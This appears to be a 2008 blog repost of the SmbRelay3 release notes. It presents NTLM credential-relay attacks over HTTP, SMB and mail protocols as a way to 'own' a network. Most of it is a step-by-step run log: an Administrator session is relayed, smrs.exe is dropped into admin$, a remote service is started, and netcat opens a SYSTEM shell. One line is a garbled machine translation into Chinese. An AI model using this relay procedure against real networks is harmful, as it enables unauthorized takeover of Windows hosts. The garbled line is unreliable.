Most Windows networks still support insecure authentication schemes by default. This is for example what happends with NTLM who is enable by default until lastest Windows Vista.
NTLM allows users to reply incomming connections against third part systems, and authenticate themselves without knowing the password. Therefore, connecting to a system with NTLM means that you can be owned.
This authentication scheme is used on a variety of protocols, like HTTP. There is also a windows feature that allows your internet browser (iexplore) or the system (explorer) to automatically send your credentials against a network server if the server requires authentication.
If you are able to force remote users to connect to your system (HTTP or SMB) with dns attacks (poisoning,..), social engineering, email link, msn http link, xss, shutting down valid servers and getting the server ip address, or deploying some kind of malicous payload theorically, the network belongs to you. To exploit those security flaws, we have developed a new security tool named SmbRelay 3 that at this time is able to relay both HTTP and SMB authentication.
Smbrelay3 is the first public tool that allows those kinds of attacks. This version also includes an small SMB library for creating crafted messages so, if the incomming connection has Administrative privileges on the client computer, you will automatically get a shell.
翻译:默认情况下多数Windows网络仍然支持不安全的认证计划。 这例如是默认情况下什么与是的NTLM的happends使能直到lastest Windows Vista。
* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials to another smb host.
* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials to another windows computer.
* IMAP to SMB: Negotiate authentication with an email IMAP client and relay credentials to another host.
* POP3 to SMB: Negotiate authentication with an email POP3 client and relay credentials to another host.
* SMTP to SMB: Negotiate authentication with an email SMTP client SMB computer and relay credentials.
* Psexec Module: If you already know username and password you can get a shell to the remote computer. This psexec like tool works under win32 and linux as do not use Microsoft API.
* Fake interface:Under linux, a new port 445 binding is done under a different ip address. All packets sent to that interface will be replayed to the previously authenticated system.
Details
If gathered credentials have administration privileges on the target system, under those scenarios you will automatically get a remote shell to the target system. There are also two additional features:
To allow the user to automatically get a remote shell smbrelay needs to send raw smb messages to the SMB server. Thats why smbrelay3 implements its own smb library for creating special crafted packets.
Listening HTTP thread at port 81
Accepted Connection - Replaying against 192.168.1.2
Read First HTTP Request...
Sending Default HTTP 401 Error response and asking for authentiation NTLM
Read Second HTTP Request with Auhorization Header..
Init HTTP to SMB attack - Connecting with: 192.168.1.2:445
Sending SMB Authentication Handshake
Received SMB Message with NTLM v2 packet
Sending NTLM Challenge from SMB Server to the HTTP Client
Received Final Authentication packet from remote HTTP Client
UserName: Administrator
DomainName: 192.168.1.36
WorkstationName: SERVIDOR
Trying to authenticate to remote SMB as Administrator
Sending Final SMB Authentication packet with NTLM Message type 3
SessionSetupAndX Completed
Authenticacion against 192.168.1.2 Succeed with username Administrator
Connecting against IPC$
Trying to connect to admin$
Creating Remote File smrs.exe under admin$
Writing File smrs.exe into admin$
Closing File handle - FID: 800f
Opening Remote Service Control Manager pipe \\svcctl
Sending RPC BindRequest to SCM pipe
Reading Response from Binding Request
Opening Remote Service Control Manager
Creating Remote Service
Opening Remote Service
Starting Remote Service...
Now Remote Service is executed... Try to connect to 192.168.1.2:8080
C:\\smbrelay3>nc 192.168.1.2 8080
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\\WINDOWS\\system32>
Special thanks goes to I馻ki Lopez for developing the NTLM library.
update Microsoft has released MS08-068 limitating this vulnerability to be exploited only against the same workstation and under the same protocol. Enjoy :)
发表于 2008-11-17 10:20:06
